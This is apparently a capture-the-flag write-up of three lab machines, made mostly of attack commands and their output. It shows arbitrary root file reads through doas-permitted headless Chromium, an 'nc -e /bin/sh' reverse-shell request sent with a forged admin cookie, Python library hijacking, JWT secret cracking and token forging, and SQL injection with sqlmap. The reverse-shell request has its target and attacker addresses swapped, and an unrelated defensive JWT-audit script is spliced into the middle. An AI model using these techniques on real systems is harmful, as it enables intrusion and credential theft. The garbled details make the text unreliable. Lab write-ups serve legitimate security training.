2025/03/28 16:36:41 CMD: UID=0 PID=100 |
2025/03/28 16:36:41 CMD: UID=0 PID=10 |
2025/03/28 16:36:41 CMD: UID=0 PID=1 | /sbin/init
2025/03/28 16:37:01 CMD: UID=0 PID=5212 | /usr/sbin/CRON -f
2025/03/28 16:37:01 CMD: UID=0 PID=5213 | /usr/sbin/CRON -f
2025/03/28 16:37:01 CMD: UID=0 PID=5214 | /bin/sh -c /root/script.sh
2025/03/28 16:37:01 CMD: UID=0 PID=5215 | /bin/bash /root/script.sh
A cron job runs /root/script.sh as root. Recall the doas rule permit nopass :softly as root cmd /usr/bin/chromium: chromium is only a browser, and the box has no desktop, so the choices are headless mode or forwarding a remote-debugging port out to Kali. I never got socat to cooperate, so I used headless mode with --dump-dom on file:// URLs, which amounts to arbitrary file read as root. The first attempt at the script came back empty because the path was mistyped as scripts.sh; listing file:///root/ shows script.sh (38 bytes) next to root.txt and a script.js (1208 bytes), so read script.js:
softly@Chromee:~$ doas -u root /usr/bin/chromium -headless --no-sandbox --disable-gpu --dump-dom file:///root/scripts.sh
[0328/164332.647180:WARNING:bluez_dbus_manager.cc(248)] Floss manager not present, cannot set Floss enable/disable.
<html><head></head><body></body></html>
softly@Chromee:~$ doas -u root /usr/bin/chromium -headless --no-sandbox --disable-gpu --dump-dom file:///root/
[0328/164339.741300:WARNING:bluez_dbus_manager.cc(248)] Floss manager not present, cannot set Floss enable/disable.
<html><head><script>start("/root/");</script>
<script>onHasParentDirectory();</script>
<script>addRow(".cache",".cache",1,4096,"4.0 kB",1741352446,"3/7/25, 2:00:46 PM");</script>
<script>addRow(".config",".config",1,4096,"4.0 kB",1741352227,"3/7/25, 1:57:07 PM");</script>
<script>addRow(".gnupg",".gnupg",1,4096,"4.0 kB",1741342463,"3/7/25, 11:14:23 AM");</script>
<script>addRow(".local",".local",1,4096,"4.0 kB",1673787535,"1/15/23, 1:58:55 PM");</script>
<script>addRow(".npm",".npm",1,4096,"4.0 kB",1741353605,"3/7/25, 2:20:05 PM");</script>
<script>addRow(".ssh",".ssh",1,4096,"4.0 kB",1741311069,"3/7/25, 2:31:09 AM");</script>
<script>addRow("node_modules","node_modules",1,4096,"4.0 kB",1741361623,"3/7/25, 4:33:43 PM");</script>
<script>addRow(".bash_history",".bash_history",0,0,"0 B",1743160930,"3/28/25, 12:22:10 PM");</script>
<script>addRow(".bashrc",".bashrc",0,3526,"3.4 kB",1673789490,"1/15/23, 2:31:30 PM");</script>
<script>addRow(".lesshst",".lesshst",0,33,"33 B",1741310850,"3/7/25, 2:27:30 AM");</script>
<script>addRow(".profile",".profile",0,161,"161 B",1562666750,"7/9/19, 12:05:50 PM");</script>
<script>addRow(".python_history",".python_history",0,12,"12 B",1741341445,"3/7/25, 10:57:25 AM");</script>
<script>addRow(".selected_editor",".selected_editor",0,66,"66 B",1741311649,"3/7/25, 2:40:49 AM");</script>
<script>addRow("package-lock.json","package-lock.json",0,2383,"2.3 kB",1741361623,"3/7/25, 4:33:43 PM");</script>
<script>addRow("package.json","package.json",0,69,"69 B",1741361623,"3/7/25, 4:33:43 PM");</script>
<script>addRow("root.txt","root.txt",0,39,"39 B",1741348914,"3/7/25, 1:01:54 PM");</script>
<script>addRow("script.js","script.js",0,1208,"1.2 kB",1741363600,"3/7/25, 5:06:40 PM");</script>
<script>addRow("script.sh","script.sh",0,38,"38 B",1741363755,"3/7/25, 5:09:15 PM");</script>
</head><body></body></html>
softly@Chromee:~$ doas -u root /usr/bin/chromium -headless --no-sandbox --disable-gpu --dump-dom file:///root/script.js
[0328/164348.249361:WARNING:bluez_dbus_manager.cc(248)] Floss manager not present, cannot set Floss enable/disable.
<html><head><meta name="color-scheme" content="light dark"></head><body><pre style="word-wrap: break-word; white-space: pre-wrap;">const CDP = require('chrome-remote-interface');
async function sendPostRequest() {
const client = await CDP();
const { Network, Page, Runtime } = client;
try {
// enable network debugging
await Network.enable();
// enable page debugging
await Page.enable();
// navigate to the page
await Page.navigate({ url: 'http://127.0.0.1:80' });
await Page.loadEventFired(); // wait for the page to finish loading
console.log('Page loaded. Sending POST request...');
// run fetch inside the browser context to send the POST request
const postData = JSON.stringify({ key: 'UGhhbnRvbSBFbmdhZ2UK' });
const script = `
fetch('http://127.0.0.1/post.php', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: '${postData}'
}).then(res => res.text()).then(console.log).catch(console.error);
`;
// execute the JavaScript in the page via Runtime.evaluate
await Runtime.evaluate({ expression: script });
} catch (err) {
console.error('Error:', err);
} finally {
client.close();
}
}
sendPostRequest();
</pre></body></html>
That exposes root's password: UGhhbnRvbSBFbmdhZ2UK. It happens to be the base64 encoding of "Phantom Engage", but the encoded string itself is what su accepts:
softly@Chromee:~$ su - root
Password:
root@Chromee:~# id
uid=0(root) gid=0(root) grupos=0(root)
root@Chromee:~# ls -al
total 76
drwx------ 9 root root 4096 mar 7 17:09 .
drwxr-xr-x 18 root root 4096 mar 7 10:41 ..
lrwxrwxrwx 1 root root 9 abr 23 2023 .bash_history -> /dev/null
-rw------- 1 root root 3526 ene 15 2023 .bashrc
drwxr-xr-x 4 root root 4096 mar 7 14:00 .cache
drwxr-xr-x 4 root root 4096 mar 7 13:57 .config
drwx------ 3 root root 4096 mar 7 11:14 .gnupg
-rw------- 1 root root 33 mar 7 02:27 .lesshst
drw------- 3 root root 4096 ene 15 2023 .local
drwxr-xr-x 6 root root 4096 mar 7 16:33 node_modules
drwxr-xr-x 4 root root 4096 mar 7 14:20 .npm
-rw-r--r-- 1 root root 69 mar 7 16:33 package.json
-rw-r--r-- 1 root root 2383 mar 7 16:33 package-lock.json
-rw------- 1 root root 161 jul 9 2019 .profile
-rw------- 1 root root 12 mar 7 10:57 .python_history
-r-------- 1 root root 39 mar 7 13:01 root.txt
-rw-r--r-- 1 root root 1208 mar 7 17:06 script.js
-rwxr-xr-x 1 root root 38 mar 7 17:09 script.sh
-rw-r--r-- 1 root root 66 mar 7 02:40 .selected_editor
drw-r--r-- 2 root root 4096 mar 7 02:31 .ssh
root@Chromee:~# cat root.txt
flag{e96f7a29ba633b4e43214b43d1791074}
Newbee
Information gathering
The VMware MAC address 00:0C:29:15:F1:A2 identifies the target as 192.168.1.102:
┌──(root㉿kali-plus)-[/]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:1d:89:b5, IPv4: 192.168.1.104
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.1 3c:06:a7:fa:49:88 TP-LINK TECHNOLOGIES CO.,LTD.
192.168.1.100 e0:2e:0b:94:50:57 Intel Corporate
192.168.1.102 00:0c:29:15:f1:a2 VMware, Inc.
192.168.1.103 60:e3:2b:ab:61:39 Intel Corporate
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.998 seconds (128.13 hosts/sec). 4 responded
┌──(root㉿kali-plus)-[/]
└─# nmap 192.168.1.102 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-29 00:09 CST
Nmap scan report for bogon (192.168.1.102)
Host is up (0.00064s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:15:F1:A2 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 4.85 seconds
Enumerate directories with gobuster:
┌──(root㉿kali-plus)-[/]
└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.102/ -x.txt,.php,.zip
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.102/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,php,zip
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 278]
/index.php (Status: 200) [Size: 18852]
/contact.php (Status: 200) [Size: 8853]
/about.php (Status: 200) [Size: 10036]
/blog.php (Status: 200) [Size: 9782]
/products.php (Status: 200) [Size: 12163]
/terms.php (Status: 200) [Size: 6670]
/assets (Status: 301) [Size: 315] [--> http://192.168.1.102/assets/]
/testimonials.php (Status: 200) [Size: 7907]
/javascript (Status: 301) [Size: 319] [--> http://192.168.1.102/javascript/]
/checkout.php (Status: 200) [Size: 13307]
/secret.php (Status: 200) [Size: 2187]
/.php (Status: 403) [Size: 278]
/server-status (Status: 403) [Size: 278]
Progress: 882236 / 882240 (100.00%)
===============================================================
Finished
===============================================================
user flag
/secret.php can execute commands, but we lack the permission for it, so look for another way in: use wfuzz to fuzz for a parameter that allows arbitrary file read.
┌──(root㉿kali-plus)-[/]
└─# wfuzz -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://192.168.1.102/?FUZZ=../../../../../../etc/passwd --hh 18851
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.1.102/?FUZZ=../../../../../../etc/passwd
Total requests: 4744
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000002049: 200 376 L 1270 W 18863 Ch "hack"
Total time: 0
Processed Requests: 4744
Filtered Requests: 4743
Requests/sec.: 0
So the hack parameter does read files, but reading the PHP source directly does not seem to work; try the PHP stream wrapper (php://) instead.
The content of secret.php is read successfully as base64; decode it:
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>命令行控制台</title>
<style>
body {
background-color: #1e1e1e;
font-family: Consolas, monospace;
color: #fff;
margin: 0;
padding: 0;
}
.console {
width: 80%;
margin: 50px auto;
padding: 20px;
background-color: #000;
border-radius: 8px;
box-shadow: 0 4px 10px rgba(0, 0, 0, 0.5);
height: 400px;
overflow-y: auto;
font-size: 16px;
}
.output {
white-space: pre-wrap;
margin-bottom: 10px;
}
.input-container {
display: flex;
align-items: center;
}
.input-container .prompt {
color: #00ff00;
margin-right: 5px;
}
.input-container input {
background: transparent;
border: none;
color: #fff;
width: 100%;
padding: 5px;
font-size: 16px;
outline: none;
}
.input-container input:focus {
border: 1px solid #00ff00;
}
.input-container input::placeholder {
color: #888;
}
.console-footer {
padding-top: 10px;
color: #888;
font-size: 12px;
text-align: center;
}
</style>
</head>
<body>
<div class="console">
<div class="output" id="output">
<?php
if (isset($_COOKIE['AreYouAdmin']) && $_COOKIE['AreYouAdmin'] === 'Yes') {
if (isset($_GET['command'])) {
$command = $_GET['command'];
$output = shell_exec($command);
echo '<div>\> ' . htmlspecialchars($command) . '</div>';
echo '<div>' . nl2br(htmlspecialchars($output)) . '</div>';
}
} else {
echo '<div>No permission to execute commands, lacking admin permission.</div>';
}
?>
</div>
<div class="input-container">
<span class="prompt">\></span>
<form method="get">
<input type="text" name="command" id="input" placeholder="command..." autocomplete="off">
</form>
</div>
</div>
<script>
const inputField = document.getElementById("input");
inputField.focus();
</script>
</body>
</html>
The PHP code has a single check: the cookie AreYouAdmin must be set to Yes. Capture the request and modify it:
GET /secret.php?command=nc+-e+/bin/sh+192.168.1.102+1234 HTTP/1.1
Host: 192.168.1.104
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Cookie: AreYouAdmin=Yes
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.1.104/secret.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
That gives us a shell.
sudo -l
Matching Defaults entries for www-data on Newbee:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
targetpw, use_pty
User www-data may run the following commands on Newbee:
(debian) NOPASSWD: /usr/bin/python3 /var/www/html/vuln.py
cat /var/www/html/vuln.py
import random
import time
import math
import string
import datetime

def generate_random_string(length=10):
    return ''.join(random.choices(string.ascii_letters + string.digits, k=length))

def pointless_computation():
    number = random.randint(1, 1000)
    result = math.sqrt(number) * math.log(number)
    print(f"Calculated math nonsense: sqrt({number}) * log({number}) = {result}")

def simulate_time_wasting():
    now = datetime.datetime.now()
    print(f"Started wasting time at {now}")
    time.sleep(2)  # deliberately sleep for 2 seconds
    later = datetime.datetime.now()
    print(f"Finished wasting time at {later}. Time wasted: {later - now}")

def pointless_string_operations():
    rand_str = generate_random_string()
    print(f"Generated random string: {rand_str}")
    reversed_str = rand_str[::-1]
    print(f"Reversed string: {reversed_str}")
    print(f"String length: {len(rand_str)}")

if __name__ == "__main__":
    pointless_computation()
    simulate_time_wasting()
    pointless_string_operations()
    print("All done. The script accomplished nothing useful.")
Now look at the file: it only imports a few standard libraries. When Python imports a module it searches the script's own directory first, and /var/www/html is writable by www-data, so we can drop a module file there (random.py) with the content import os;os.system("/bin/bash"). When another user runs the script through sudo, the import resolves to our fake module before the real one (library hijacking), and we get a shell as that user.
sudo -l
Matching Defaults entries for www-data on Newbee:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
targetpw, use_pty
User www-data may run the following commands on Newbee:
(debian) NOPASSWD: /usr/bin/python3 /var/www/html/vuln.py
cd /var/www/html
ls
flask
shop
vuln.py
echo 'import os;os.system("/bin/bash")' > random.py
sudo -u debian /usr/bin/python3 /var/www/html/vuln.py
id
uid=1000(debian) gid=1000(debian) groups=1000(debian),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev)
This gives a shell as the debian user, and then the user flag:
ls
config.php
note.txt
user.txt
cat user.txt
ed2b1f468c5f915f3f1cf75d7068baae
cat note.txt
Damn it, I forgot my database password. I heard that Debian is currently building a message board, maybe he can help me
root flag
That is one hint; there is also a .secret folder holding another hint:
cat hint.txt
password is md5(key)
and key is in mysql!!!!!!
The hint says the password is the md5 of a key stored in MySQL.
ss -lntup
Netid State Recv-Q Send-Q Local Address:Port Peer Address:PortProcess
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.1:5000 0.0.0.0:*
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 128 [::]:22 [::]:*
tcp LISTEN 0 511 *:80 *:*
Port 5000 is listening on the loopback interface only, so we need to forward it out with socat, which this machine happens to have; look up a command with tldr and forward it:
socat TCP-LISTEN:8000,fork TCP4:127.0.0.1:5000
ss -lntup
Netid State Recv-Q Send-Q Local Address:Port Peer Address:PortProcess
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.1:5000 0.0.0.0:*
tcp LISTEN 0 5 0.0.0.0:8000 0.0.0.0:* users:(("socat",pid=2160,fd=5))
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 128 [::]:22 [::]:*
tcp LISTEN 0 511 *:80 *:*
The forward works. Visit ip:8000, where a login is required; any credentials will do. Admin status is decided by a JWT, so first crack its signing secret with john:
┌──(root㉿kali-plus)-[~]
└─# john tmp --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (HMAC-SHA256 [password is key, SHA256 256/256 AVX2 8x])
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
noob (?)
1g 0:00:00:00 DONE (2025-03-30 23:25) 1.449g/s 7313Kp/s 7313Kc/s 7313KC/s normaluz,2604...nmloera!
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
The secret is noob. Next, forge a JWT with jwt_tool (https://github.com/ticarpi/jwt_tool):
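As an added example (not from the write-up or jwt_tool), the Python below does the check john performed, but as a defender's audit of tokens your own service issued: it splits the issued token shown above, verifies its HS256 signature against a candidate secret with a constant-time comparison, and reports whether any word from a short constructed wordlist signs it. Standard library only; the wordlist is made up.

```python
"""Added example: detect an HS256 JWT signed with a wordlist secret, the weakness
that let the token above be re-signed with `noob`."""
import base64
import hashlib
import hmac
import json
from typing import Dict, Iterable, Optional, Tuple

# Token the message board issued to the low-privilege user (from the write-up).
ISSUED_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJ1c2VybmFtZSI6ImFhZCIsImV4cCI6MTc0MzM1MTcxN30."
    "6I8qsnUorIfYfPHxF09yD3KLcFVirHHw0rHz9yIz2Ms"
)

# Constructed mini wordlist; the write-up used rockyou.txt.
SAMPLE_WORDLIST = ["password", "123456", "secret", "noob", "admin"]


def b64url_decode(segment: str) -> bytes:
    """Decode a base64url segment, restoring the '=' padding JWTs strip."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def split_token(token: str) -> Tuple[Dict, Dict, bytes, bytes]:
    """Return (header, payload, signing_input, signature) for a compact JWS."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    payload = json.loads(b64url_decode(payload_b64))
    # The signature covers the two encoded segments exactly as transmitted.
    signing_input = f"{header_b64}.{payload_b64}".encode("ascii")
    return header, payload, signing_input, b64url_decode(sig_b64)


def verify_hs256(token: str, secret: str) -> bool:
    """True if signature == HMAC-SHA256(secret, header.payload).

    Only HS256 is accepted: a token whose header says none or RS256 is rejected
    outright rather than being verified under whatever `alg` the client chose.
    """
    header, _payload, signing_input, signature = split_token(token)
    if header.get("alg") != "HS256":
        return False
    expected = hmac.new(secret.encode("utf-8"), signing_input, hashlib.sha256).digest()
    return hmac.compare_digest(expected, signature)


def find_weak_secret(token: str, candidates: Iterable[str]) -> Optional[str]:
    """Offline audit: the first candidate that verifies the token, or None.

    Any hit means every client holding a token can mint its own, exactly as the
    username=admin re-signing above did, and the secret must be rotated.
    """
    for candidate in candidates:
        if verify_hs256(token, candidate):
            return candidate
    return None
```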
┌──(root㉿kali-plus)-[~/jwt_tool]
└─# cat setup.txt
git clone https://github.com/ticarpi/jwt_tool
cd jwt_tool
sudo apt install python3-pip
python3 -m pip install termcolor cprint pycryptodomex requests
chmod +x jwt_tool.py
┌──(root㉿kali-plus)-[~/jwt_tool]
└─# python3 -m pip install termcolor cprint pycryptodomex requests
Requirement already satisfied: termcolor in /usr/lib/python3/dist-packages (2.4.0)
Requirement already satisfied: cprint in /usr/local/lib/python3.11/dist-packages (1.2.2)
Requirement already satisfied: pycryptodomex in /usr/lib/python3/dist-packages (3.11.0)
Requirement already satisfied: requests in /usr/lib/python3/dist-packages (2.31.0)
WARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager, possibly rendering your system unusable. It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv. Use the --root-user-action option if you know what you are doing and want to suppress this warning.
┌──(root㉿kali-plus)-[~/jwt_tool]
└─# python3 -m pip install termcolor cprint pycryptodomex requests --root-user-action
Usage:
/usr/bin/python3 -m pip install [options] <requirement specifier> [package-index-options] ...
/usr/bin/python3 -m pip install [options] -r <requirements file> [package-index-options] ...
/usr/bin/python3 -m pip install [options] [-e] <vcs project url> ...
/usr/bin/python3 -m pip install [options] [-e] <local project path> ...
/usr/bin/python3 -m pip install [options] <archive url/path> ...
--root-user-action option requires 1 argument
┌──(root㉿kali-plus)-[~/jwt_tool]
└─# python3 jwt_tool.py -T -S hs256 -p noob eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFhZCIsImV4cCI6MTc0MzM1MTcxN30.6I8qsnUorIfYfPHxF09yD3KLcFVirHHw0rHz9yIz2Ms
jwt_tool Version 2.2.7 @ticarpi
Original JWT:
====================================================================
This option allows you to tamper with the header, contents and
signature of the JWT.
====================================================================
Token header values:
[1] alg = "HS256"
[2] typ = "JWT"
[3] *ADD A VALUE*
[4] *DELETE A VALUE*
[0] Continue to next step
Please select a field number:
(or 0 to Continue)
> 0
Token payload values:
[1] username = "aad"
[2] exp = 1743351717 ==> TIMESTAMP = 2025-03-31 00:21:57 (UTC)
[3] *ADD A VALUE*
[4] *DELETE A VALUE*
[5] *UPDATE TIMESTAMPS*
[0] Continue to next step
Please select a field number:
(or 0 to Continue)
> 1
Current value of username is: aad
Please enter new value and hit ENTER
> admin
[1] username = "admin"
[2] exp = 1743351717 ==> TIMESTAMP = 2025-03-31 00:21:57 (UTC)
[3] *ADD A VALUE*
[4] *DELETE A VALUE*
[5] *UPDATE TIMESTAMPS*
[0] Continue to next step
Please select a field number:
(or 0 to Continue)
> 0
jwttool_d6329eb7a09f667401ace111e474bb4f - Tampered token - HMAC Signing:
[+] eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNzQzMzUxNzE3fQ.WcYe5TS2RTGyy7rrpnb6Ja03VD7QKhfjTv2Rkcsj_Jo
HTTP/1.1 200 OK
Server: Werkzeug/3.1.3 Python/3.11.2
Date: Sun, 30 Mar 2025 15:43:15 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2302
Connection: close
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Message Board</title>
<style>
body {
font-family: Arial, sans-serif;
background-color: #f4f4f4;
margin: 0;
padding: 20px;
text-align: center;
}
.container {
max-width: 600px;
margin: auto;
background: white;
padding: 20px;
border-radius: 8px;
box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
}
h2 {
color: #333;
}
.message {
padding: 10px;
margin: 10px 0;
background: #f9f9f9;
border-radius: 5px;
text-align: left;
}
.author {
font-weight: bold;
color: #007bff;
}
.nav {
text-align: right;
margin-bottom: 10px;
}
.btn {
padding: 5px 10px;
text-decoration: none;
color: white;
background: #007bff;
border-radius: 5px;
display: inline-block;
}
.btn.logout {
background: #dc3545;
}
</style>
</head>
<body>
<div class="container">
<div class="nav">
<a href="/logout" class="btn logout">Logout (admin)</a>
</div>
<h2>Message Board</h2>
<div class="message">
<p class="author">admin</p>
<p>Welcome to the secure message board!</p>
</div>
<div class="message">
<p class="author">admin</p>
<p>Mysql account: root:TheStrongestPasswordHYHcreated</p>
</div>
<div class="message">
<p class="author">user1</p>
<p>I think this is a great project!</p>
</div>
<div class="message">
<p class="author">user2</p>
<p>Hello everyone! Nice to be here.</p>
</div>
</div>
<!--
Todo:My secret key is very simple, I will change it soon.
-->
</body>
</html>
Swap in the forged JWT and the admin board reveals the database password TheStrongestPasswordHYHcreated; log in to the database:
www-data@Newbee:/var/www/html/shop$ mysql -u root -p
mysql -u root -p
Enter password: TheStrongestPasswordHYHcreated
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 8
Server version: 10.11.6-MariaDB-0+deb12u1 Debian 12
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| sys |
| user |
+--------------------+
5 rows in set (0.001 sec)
MariaDB [(none)]> use user;
use user;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [user]> show tables;
show tables;
+----------------+
| Tables_in_user |
+----------------+
| user |
+----------------+
1 row in set (0.001 sec)
MariaDB [user]> select * from user;
select * from user;
+----+----------+--------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------+
| id | username | passwd | salt | passwd_hash_algo |
+----+----------+--------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------+
| 1 | debian | 2c082e3ff2ca15e3b24f815d70653f0dead09534495069dd140e19adb2d117266cc4b1de8daf55c7c4827a0a5ccf70c6f537ffc4ddc74db4865c41c0 | 8bf3e3452b78544f8bee9400d6936d34 | pbdf2$50500$60 |
+----+----------+--------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------+
1 row in set (0.123 sec)
Then hand the hash to an AI to produce a brute-force script; the recovered password is 1qaz2wsx. Per the earlier hint, the password is md5(key):
┌──(root㉿kali-plus)-[~]
└─# echo -n '1qaz2wsx' |md5sum
1c63129ae9db9c60c3e8aa94d3e00495
That is the password for the archive. Extract it to get password.png, send it to Kali with nc and then to the local machine. It is a pixelated image, and a project on GitHub turns out to use this very image as its example. Project address:
https://github.com/spipm/Depixelization_poc
The image originally read Hello from the other side, which should be the root password. It doesn't work; try lowercase, hello from the other side, still wrong; there should be no spaces: hellofromtheotherside
debian@Newbee:/tmp$ su - root
su - root
Password: hellofromtheotherside
root@Newbee:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@Newbee:~# ls
ls
root.txt
root@Newbee:~# cat root.txt
cat root.txt
c18b3eff03996f3a203f63733be03d15
SingDanceRap
Information gathering
The MAC address is 00:0C:29:E2:FD:6E, so the IP address is 192.168.50.58.
┌──(root㉿kali-plus)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:1d:89:b5, IPv4: 192.168.50.85
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.50.1 fc:34:97:da:9f:88 ASUSTek COMPUTER INC.
192.168.50.58 00:0c:29:e2:fd:6e VMware, Inc.
192.168.50.155 e0:2e:0b:94:50:57 Intel Corporate
192.168.50.170 52:9c:20:6d:2d:db (Unknown: locally administered)
192.168.50.253 70:a8:d3:1d:8a:67 Intel Corporate
192.168.50.103 da:8e:c3:1d:21:85 (Unknown: locally administered)
6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.004 seconds (127.74 hosts/sec). 6 responded
┌──(root㉿kali-plus)-[~]
└─# nmap 192.168.50.58 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-31 15:00 CST
Nmap scan report for singdancerap (192.168.50.58)
Host is up (0.0014s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
65000/tcp filtered unknown
MAC Address: 00:0C:29:E2:FD:6E (VMware)
Nmap done: 1 IP address (1 host up) scanned in 6.16 seconds
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>News Website</title>
<link rel="stylesheet" href="styles.css">
</head>
<body>
<header>
<h1>News Website</h1>
<nav>
<ul>
<li><a href="#">Home</a></li>
<li><a href="news.php?title=sing">Sing News</a></li>
<li><a href="news.php?title=dance">Dance News</a></li>
<li><a href="news.php?title=rap">Rap News</a></li>
</ul>
</nav>
</header>
<main>
<section class="hero">
<h2>Today's Headlines</h2>
<p>Stay updated with the latest and most popular news.</p>
<a href="#" class="btn">Read More</a>
</section>
<section class="news">
<article class="news-item">
<h3>Singing News Headline</h3>
<p>This is a brief description of singing news.</p>
<a href="#" class="read-more">Read Full Article</a>
</article>
<article class="news-item">
<h3>Dancing News Headline</h3>
<p>This is a brief description of dancing news.</p>
<a href="#" class="read-more">Read Full Article</a>
</article>
<article class="news-item">
<h3>Rapping News Headline</h3>
<p>This is a brief description of rap news.</p>
<a href="#" class="read-more">Read Full Article</a>
</article>
</section>
</main>
<footer>
<p>© 2023 News Website. All rights reserved.</p>
</footer>
</body>
</html>
Use gobuster to scan for directories:
┌──(root㉿kali-plus)-[~]
└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.50.58/ -x.txt,.php
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.50.58/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 278]
/news.php (Status: 200) [Size: 1301]
/.php (Status: 403) [Size: 278]
/littlesecrets (Status: 301) [Size: 322] [--> http://192.168.50.58/littlesecrets/]
/server-status (Status: 403) [Size: 278]
Progress: 661677 / 661680 (100.00%)
===============================================================
Finished
===============================================================
Scan the /littlesecrets directory again:
┌──(root㉿kali-plus)-[~]
└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.50.58/littlesecrets -x.txt,.php,.html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.50.58/littlesecrets
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,txt,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 278]
/.html (Status: 403) [Size: 278]
/login.php (Status: 200) [Size: 1983]
/manager.php (Status: 302) [Size: 0] [--> login.php]
/.html (Status: 403) [Size: 278]
/.php (Status: 403) [Size: 278]
Progress: 882236 / 882240 (100.00%)
===============================================================
Finished
===============================================================
There is a login page, but no weak credentials turned up, so SQL injection is the guess. Capture the login request and let sqlmap run on it:
┌──(root㉿kali-plus)-[~]
└─# sqlmap -l sing.txt --batch
sqlmap {1.9#stable} https://sqlmap.org
